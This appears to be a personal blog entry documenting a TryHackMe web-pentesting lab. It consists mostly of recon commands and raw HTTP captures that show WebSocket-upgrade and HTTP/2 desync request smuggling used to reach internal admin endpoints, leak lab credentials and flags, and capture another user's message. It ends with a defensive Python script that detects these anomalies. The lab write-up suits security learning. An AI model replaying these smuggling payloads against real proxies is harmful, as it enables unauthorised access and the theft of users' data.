
Training Update v0.106


It’s Thursday, and we are nearing the end of another week and of the Web Application Pentesting pathway on THM!

We have one more challenge to complete, the El Bandito room. It looks like it’s going to be a bit of a tough one, but as always we shall persist, even if we need to use a guide to get through it, because it’s all about learning at the end of the day!


nmap -sV -sC -p- 10.10.242.142 -vv


http://10.10.242.142:8080/


http://10.10.242.142:8080/burn.html


gobuster dir -u https://elbandito.thm:80 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k


https://elbandito.thm:80


view-source:https://elbandito.thm:80/


http://10.10.66.127:8080/info


http://10.10.66.127:8080/assets


http://10.10.66.127:8080/health


http://10.10.66.127:8080/tokens


Strange.. I saw a number before like 168.0 something..

GET /isOnline?url=http://10.11.125.150:8081/ HTTP/1.1
Host: 10.10.66.127:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0


http://elbandito.thm:8080/services.html

GET /isOnline?url=http://10.11.125.150:5555 HTTP/1.1
Host: elbandito.thm:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 777
Origin: http://elbandito.thm:8080
Sec-WebSocket-Key: 3vSZkmbaX99FKC2xCUF+UA==
Connection: keep-alive, Upgrade
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
Content-Length: 0

GET /trace HTTP/1.1
Host: elbandito.thm:8080

GET /isOnline?url=http://10.11.125.150:5555 HTTP/1.1
Host: elbandito.thm:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 777
Origin: http://elbandito.thm:8080
Sec-WebSocket-Key: 3vSZkmbaX99FKC2xCUF+UA==
Connection: keep-alive, Upgrade
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
Content-Length: 0

GET /admin-creds HTTP/1.1
Host: elbandito.thm:8080

username:hAckLIEN password:YouCanCatchUsInYourDreams404

GET /isOnline?url=http://10.11.125.150:5555 HTTP/1.1
Host: elbandito.thm:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 777
Origin: http://elbandito.thm:8080
Sec-WebSocket-Key: 3vSZkmbaX99FKC2xCUF+UA==
Connection: keep-alive, Upgrade
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
Content-Length: 0

GET /admin-flag HTTP/1.1
Host: elbandito.thm:8080

Flag – THM{:::MY_DECLINATION:+62°_14\’_31.4”::}

https://elbandito.thm:80/access


https://elbandito.thm:80/messages

POST /send_message HTTP/2
Host: elbandito.thm:80
Cookie: session=eyJ1c2VybmFtZSI6ImhBY2tMSUVOIn0.aByhfg.cDEB1TU2DdwlyggZmQNLkvkulO8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://elbandito.thm:80/access
Dnt: 1
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Content-Length: 16

data=hello world

POST / HTTP/2
Host: elbandito.thm:80
Cookie: session=eyJ1c2VybmFtZSI6ImhBY2tMSUVOIn0.Z0CrHA.e5lrq5E_loCdjx8-xG7OUbDQMlQ
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Length: 0

POST /send_message HTTP/1.1
Host: elbandito.thm:80
Cookie: session=eyJ1c2VybmFtZSI6ImhBY2tMSUVOIn0.Z0CrHA.e5lrq5E_loCdjx8-xG7OUbDQMlQ
Content-Type: application/x-www-form-urlencoded
Content-Length: 730

data=

Flag – THM{¡!¡RIGHT_ASCENSION_12h_36m_25.46s!¡!}
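
As an added example (not part of the original write-up or the room), the Python code below audits a captured client message for the two anomalies visible in the requests above: a WebSocket upgrade whose Sec-WebSocket-Version is not 13, and a request line sitting beyond the declared Content-Length. The function name, finding labels and sample hosts are assumptions, and each sample is treated as one client message as a proxy history shows it.

```python
import re

# Start of an HTTP/1.x request line, e.g. b"GET /trace HTTP/1.1\r\n".
REQUEST_LINE = re.compile(rb"[A-Z]+ \S+ HTTP/1\.[01]\r\n")

def audit_request(raw: bytes) -> list[str]:
    """Return findings for one captured client message (head plus all bytes sent after it)."""
    head, sep, sent_body = raw.partition(b"\r\n\r\n")
    if not sep:
        return ["incomplete-head"]
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    findings = []
    # RFC 6455 defines only version 13; any other value must not open a tunnel.
    if (headers.get(b"upgrade", b"").lower() == b"websocket"
            and headers.get(b"sec-websocket-version") != b"13"):
        findings.append("unsupported-websocket-version")
    declared = headers.get(b"content-length", b"0")
    if not declared.isdigit():
        return findings + ["invalid-content-length"]
    excess = sent_body[int(declared):]
    # Bytes past the declared length that parse as a request line should be rejected.
    if REQUEST_LINE.match(excess):
        findings.append("request-line-after-declared-body")
    return findings

# Constructed samples shaped like the captures on this page (hosts are placeholders).
SUSPECT_UPGRADE = (
    b"GET /isOnline?url=http://198.51.100.7:5555 HTTP/1.1\r\n"
    b"Host: app.example.test:8080\r\n"
    b"Sec-WebSocket-Version: 777\r\n"
    b"Upgrade: websocket\r\n"
    b"Content-Length: 0\r\n\r\n"
    b"GET /trace HTTP/1.1\r\nHost: app.example.test:8080\r\n\r\n"
)
SUSPECT_LENGTH = (
    b"POST / HTTP/2\r\nHost: app.example.test\r\nContent-Length: 0\r\n\r\n"
    b"POST /send_message HTTP/1.1\r\nHost: app.example.test\r\n"
    b"Content-Length: 730\r\n\r\ndata="
)
CLEAN = (
    b"POST /send_message HTTP/1.1\r\nHost: app.example.test\r\n"
    b"Content-Length: 16\r\n\r\ndata=hello world"
)

if __name__ == "__main__":
    for sample in (SUSPECT_UPGRADE, SUSPECT_LENGTH, CLEAN):
        print(audit_request(sample))
```

A front-end that sees either finding should reject the message instead of forwarding it to the back-end.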


Credit – https://0xb0b.gitbook.io/writeups/tryhackme/2024/el-bandito#a-smugglers-tale

Will come back to this room at a later date..


This is stupid –


Until next time & don’t sleepwalk through life!

Shalom